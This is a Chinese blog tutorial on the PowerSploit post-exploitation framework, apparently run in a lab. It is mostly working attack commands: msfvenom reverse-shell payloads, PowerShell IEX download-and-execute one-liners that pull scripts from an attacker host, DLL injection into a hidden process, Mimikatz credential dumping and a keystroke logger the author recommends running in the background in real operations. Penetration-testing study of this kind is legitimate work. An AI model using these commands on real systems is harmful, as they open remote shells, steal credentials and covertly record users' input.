PowerSploit攻击

最新推荐文章于 2024-04-23 22:00:47 发布
最新推荐文章于 2024-04-23 22:00:47 发布
阅读量422 收藏 5
点赞数
分类专栏: powershell渗透 文章标签: powershell 内网渗透测试 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45007073/article/details/116485215
版权

PowerSploit

简介

PowerSploit是一款后渗透框架,主要用于信息侦察、权限提升、权限维持。它在github上可以下载

各模块功能

模块功能
AntivirusBypass发现杀毒软件的查杀特征
CodeExecution在目标主机上执行代码
Exfiltration目标主机上的信息搜集工具
Mayhem蓝屏等破坏性脚本
Persistence后门脚本
Recon以目标主机为跳板进行内网信息侦察
ScriptModification在目标主机上创建或修改脚本

在这里插入图片描述

Invoke-Shellcode

首先我们在msf上开启监听
在这里插入图片描述
然后使用如下命令生成一个powershell木马

msfvenom -p windows/meterpreter/reverse_http lhost=172.16.179.87 lport=4444 -f powershell -o /var/www/html/test

在这里插入图片描述

然后我们使用powershell在目标机器上进行远程加载,并强制执行

IEX (New-Object System.Net.WebClient).DownloadString("http://172.16.179.87/Invoke-Shellcode.ps1")
IEX (New-Object System.Net.WebClient).DownloadString("http://172.16.179.87/test")
Invoke-Shellcode -Shellcode ($buf) -Force

在这里插入图片描述
发现kali已经返回了一个shell
在这里插入图片描述

Invoke-DllInjection

我们先将invoke-dllinjection这个文件加载过来,然后隐蔽地开启一个notepad进程

IEX (New-Object System.Net.WebClient).DownloadString("http://172.16.179.87/Invoke-DllInjection.ps1")
start-process C:\Windows\system32\notepad.exe -WindowStyle Hidden
get-process

在这里插入图片描述
kali的设置

msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.179.87 lport=4444 -f dll -o /var/www/html/test.dll
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 172.16.179.87
set lport 4444
run

在这里插入图片描述

我们将test.dll文件上传到目标C盘上
在这里插入图片描述
然后我们使用如下命令,进行注入

Invoke-DllInjection -ProcessID 3132 -Dll C:\test.dll

在这里插入图片描述

kali获得一个反弹的shell
在这里插入图片描述

Invoke-Portscan

首先我们先远程加载一下,然后运行运行以下命令扫描主机

IEX (New-Object System.Net.WebClient).DownloadString("http://172.16.179.87:8000/PowerSploit/Recon/Invoke-Portscan.ps1")
Invoke-Portscan -Host 172.16.179.87

在这里插入图片描述

Invoke-Mimikatz

这个脚本是Mimikatz的powershell版本,主要是用于导出票据的。我们先把Invoke-Mimikatz脚本下载到边界服务器上
在这里插入图片描述
然后在边界服务器上开启一个服务端,把脚本远程加载到另一台域主机上

IEX (New-Object System.Net.WebClient).DownloadString("http://192.168.108.100:8000/Invoke-Mimikatz.ps1")
Invoke-Mimikatz -DumpCreds

在这里插入图片描述
在这里插入图片描述

Get-Keystrokes

这个脚本用于键盘记录,功能相当强大,不仅有键盘输入记录,甚至能记录鼠标的点击情况,还能记录详细的时间,实战的时候可以直接放入后台运行。

IEX (New-Object System.Net.WebClient).DownloadString("http://172.16.179.87/PowerSploit/Exfiltration/Get-Keystrokes.ps1")
Get-Keystrokes -LogPath c:\test1.txt

在这里插入图片描述
在这里插入图片描述

平凡的学者
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
powersploit介绍以及攻击实战
weixin_43152809的博客
01-02 1864
powersploit是一款基于powershell的后渗透框架软件,包含很多powershell攻击脚本,主要用于信息侦察、权限提升、权限维持 下载地址 powersploit安装 git命令下载 git clone https://github.com/PowerShellMafia/PowerSploit/ 随后打开apache服务器,将下载的文件上传到www目录下 按照上图介绍powersploit各模块的功能 AntivirusBypass 发现杀毒软件的查杀特征 CodeExecutio
PowerSploit渗透教程
weixin_43749601的博客
03-21 2072
简介 PowerSploit是一款基于PowerShell的后渗透框架软件,包含很多Powershell攻击脚本,它们主要是用于渗透中的信息侦查、权限提升、权限维持。 https://github.com/mattifestation/PowerSploit Linux下安装和搭建Powersploit 开启Apache服务 将下载好的文件放在/var/www/html目录,搭建一个简易的服务器 在网页中打开http://localhost/PowerSploit-master/ Powersploi
PowerSploit
最新发布
sinat_25635183的博客
04-23 1317
PowerSploit是一套用于PowerShell的开源渗透测试工具集,旨在帮助安全专业人员评估和增强Windows环境的安全性。它包含了各种模块和技术,可用于执行各种攻击渗透测试任务,如权限提升、横向移动、信息收集等。PowerShell脚本模块:PowerSploit提供了一系列PowerShell脚本,用于执行各种渗透测试任务。这些脚本包括各种攻击技术,如Shellcode执行、凭据盗窃、权限提升等。Mimikatz模块。
PowerSploit脚本攻击实战
bring_coco的博客
01-24 1009
环境 kali(192.168.188.128) win7(192.168.188.148) 前提 1.输入git命令安装PowerSploit 命令:git clone https://github.com/PowerShellMafia/PowerSploit 演示: 2.输入以下命令开启Apache服务 命令:service apache2 start 演示: 3.把下载好的文件夹移动到var/www/html目录,搭建一个简易的服务器 介绍PowerSploit各模块的功能 1.Antivi
ATT&CK高频攻击技术的分析与检测.pdf
09-10
PowerSploit和Nishang等工具集可以帮助攻击者执行信息发现、特权提升和持久化等恶意操作。因此,监控Powershell活动对于防御者来说至关重要,他们需要对Powershell执行的命令和脚本进行细致的审计和分析。 总的来说...
pywerview:PowerSploitPowerView 的(部分)Python 重写
08-05
PywerView ____ __ ___ | _ \ _ ___ _____ _ _\ \ / (_) _____ __ | |_) | | | \ \ /\ / / _ \ '__... 它可以轻松找到易受攻击的机器,或列出哪些域用户被添加到机器的本地管理员组,等等。 但是,在未连接到域的计算机
pywerview, PowerSploit的( 部分) python 重写是 PowerView.zip
09-17
Pywerview是一个开源项目,它是PowerSploit工具集的一部分,被重写为Python语言版本,命名为PowerView PywerView。这个项目的主要目的是提供一个跨平台的解决方案,使得网络安全研究人员、渗透测试人员以及系统管理...
PowerSploit_Sensitive_Info_Hunter:修改后的PowerSploitPowerView可以搜索文件并与RegEx匹配以获取敏感信息(PII,PCI,密码,用户名,SNMP字符串等)
04-27
PowerSploit是一个强大的 PowerShell 模块集合,主要由安全研究人员和渗透测试人员使用,用于进行安全评估和漏洞利用。在给定的“PowerSploit_Sensitive_Info_Hunter”项目中,我们关注的是如何利用PowerShell来查找...
Active-Directory-Exploitation-Cheat-Sheet:备忘单,其中包含Windows Active Directory的常见枚举和攻击方法
02-05
- **PowerSploit**: 一套PowerShell脚本,用于信息收集、权限提升和数据清理。 - **Impacket**: 一组Python类,用于实现各种网络协议,支持攻击和防御操作。 - **Setoolkit**: 多功能渗透测试工具包,包括社会工程学...
PowerSploitPowerSploit-PowerShell开发后框架
02-18
该项目不再受支持 PowerSploit是Microsoft PowerShell模块的集合,可用于在评估的所有阶段帮助渗透测试人员。 PowerSploit由以下模块和脚本组成: 代码执行 在目标计算机上执行代码。 Invoke-DllInjection 将Dll注入到您选择的进程ID中。 Invoke-ReflectivePEInjection 将Windows PE文件(DLL / EXE)反射性地加载到powershell进程中,或反射性地将DLL注入到远程进程中。 Invoke-Shellcode 将shellcode注入您选择的进程ID或在本地PowerShell中。 Invoke-WmiCommand 在目标计算机上执行PowerShell脚本块,并使用WMI作为C2通道返回其格式化输出。 脚本修改 修改和/或准备脚本以在受感染的计算机上执行。 Out-Encoded
PowerSploit 使用方法
weixin_44844556的博客
03-13 311
powersploit
Powershell攻击指南1——PowerSploit
willow_liang的博客
12-05 1466
1.1PowerShell技术 灵活且能功能化管理Windows系统,一旦攻击者可以在计算机上执行代码,就可下载powershell脚本(.ps1)到磁盘中执行,甚至可以直接在内存中执行。 常用的powershell攻击工具: PowerSploit: 这是众多owehShe攻击工具中被广泛使用的PoweShel后期漏洞利用框架,常用于信息探测、特权提升、凭证窃取、持久化等操作。 Nishang:基于PowerShell渗透测试专用工具,集成了框架、脚本和各种Payload,包含下载和执行、键盘记
探索 PowerSploit:强大的 PowerShell 模块化渗透测试框架
gitblog_00035的博客
03-18 855
探索 PowerSploit:强大的 PowerShell 模块化渗透测试框架 在网络安全领域,渗透测试是评估系统安全性的重要手段。今天我们将为您介绍一个名为 PowerSploit 的开源渗透测试工具,它是一个模块化的 PowerShell 框架,可以帮助您更加高效地进行安全审计和漏洞利用。 PowerSploit 是什么? PowerSploit 是由 PowerShell Mafia 开发...
PowerSploit渗透测试者的强大工具箱
gitblog_00071的博客
03-19 337
PowerSploit渗透测试者的强大工具箱 项目地址:https://gitcode.com/mattifestation/PowerSploit PowerSploit 是一个广为人知的安全研究项目,主要用于 PowerShell渗透测试和安全审计。由安全研究人员 Matthew "mattifestation" Graeber 创建并维护,它是一系列模块化脚本,旨在...
PowerSploit 用法
weixin_41082546的博客
10-22 1456
PowerSploit PowerSploit是基于PowerShell的后渗透框架,包含很多PowerShell攻击脚本,主要用于渗透中的信息侦查,权限提升,权限维持,github地址为: https://github.com/PowerShellMafia/PowerSploit 安装 下载程序目录 git clone https://github.com/PowerShellMa...
Meteasploit技术
m0_65332604的博客
04-06 2298
在使用Kali操作系统是应注意即使更新源,就像平时及时更新手机APP更新命令如下: apt-get update:只更新软件包的索引源,作用:同步源的软件包的索引信息,从而进行软件更新。 Apt-get upgrade:升级系统上安装的所有软件包,如果失败则保持更新之前的状态。 Apt-get dist-upgrade:升级整个Liunux系统(不仅升级所有已安装的软件包,而且会处理升级过程中可能出现的冲突,在某些情况下,他的部分升级需要人工参与)。 渗透攻击大致步骤: *扫描目标及系统,寻找可用
PowerSploit脚本的用法
谢公子的博客
01-14 2168
目录 PowerSploit PowerSploit的用法 PowerView.ps1脚本的使用 PowerUp.ps1脚本的使用 Invoke-Allchecks模块 Invoke-NinjaCopy.ps1脚本的使用 PowerSploit PowerSploit是一款基于PowerShell的后渗透框架软件,包含了很多PowerShell攻击脚本,它们主要用于渗透中的信...
powersploit简介
weixin_30703911的博客
08-30 618
一、PowerSploit简介 PowerSploit是GitHub上面的一个安全项目,上面有很多powershell攻击脚本,它们主要被用来渗透中的信息侦察、权限提升、权限维持。 Powershell的优点: 1.代码运行在内存中可以不去接触磁盘 2.从另一个系统中下载代码并执行 3.很多安全产品并不能监测到powershell的活动 4.cmd.exe通常被阻止运行,但是...
powersploit
07-29
PowerSploit是一款基于PowerShell的后渗透框架软件,它包含了许多用于渗透测试攻击脚本。这些脚本主要用于信息侦查、权限提升和权限维持等方面的操作。\[1\]其中,Invoke-Mimikatz是PowerSploit中的一个脚本,属于...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

平凡的学者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值